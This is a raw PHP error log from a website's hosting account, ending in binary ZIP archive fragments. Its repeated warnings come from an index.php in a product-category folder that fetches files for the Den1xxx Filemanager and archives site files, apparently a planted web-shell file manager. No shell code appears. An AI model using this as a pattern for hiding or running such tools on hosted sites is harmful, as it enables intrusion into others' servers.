"/home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php.php.tar.gz" exists and must be unlinked prior to conversion in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1118 Stack trace: #0 /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php(1118): PharData->compress(4096, 'php.tar.gz') #1 {main} thrown in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 1118 [09-Nov-2025 04:18:51 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 04:18:51 UTC] PHP Warning: Undefined variable $ext in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 1118 [09-Nov-2025 04:27:24 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 04:35:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 04:43:51 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 04:51:41 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 05:17:28 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 05:23:22 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 05:29:06 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 05:35:00 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 05:41:39 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 05:47:04 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 05:52:36 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 05:58:24 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 06:03:55 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 06:16:08 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 06:27:40 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 06:40:16 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 06:51:39 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 06:51:39 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [09-Nov-2025 06:51:39 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [09-Nov-2025 06:51:39 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [09-Nov-2025 06:51:39 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [09-Nov-2025 06:51:39 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [09-Nov-2025 06:51:39 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [09-Nov-2025 07:31:26 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 07:40:18 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 07:40:18 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [09-Nov-2025 07:40:18 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [09-Nov-2025 07:40:18 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [09-Nov-2025 07:40:18 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [09-Nov-2025 07:40:18 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [09-Nov-2025 07:40:18 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [09-Nov-2025 07:48:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 07:48:23 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [09-Nov-2025 07:48:23 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [09-Nov-2025 07:48:23 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [09-Nov-2025 07:48:23 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [09-Nov-2025 07:48:23 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [09-Nov-2025 07:48:23 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [09-Nov-2025 07:56:21 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 07:56:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [09-Nov-2025 07:56:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [09-Nov-2025 07:56:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [09-Nov-2025 07:56:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [09-Nov-2025 07:56:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [09-Nov-2025 07:56:21 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [09-Nov-2025 08:04:00 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 08:07:24 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 08:10:17 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 08:14:11 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 [09-Nov-2025 08:14:11 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 218 [09-Nov-2025 08:14:11 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 219 [09-Nov-2025 08:14:11 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 220 [09-Nov-2025 08:14:11 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 221 [09-Nov-2025 08:14:11 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 222 [09-Nov-2025 08:14:11 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 223 [09-Nov-2025 08:18:15 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/product-category/ova/index.php on line 91 PKGBi[|>> index.php.tarnu[PKGBi[v5occ=>index.php.php.tar.gznu[PKGBi[|,T7T7 index.phpnuPKGBi[5berror_log.tar.gznu[PKGBi[T?}} terror_lognu[PK*r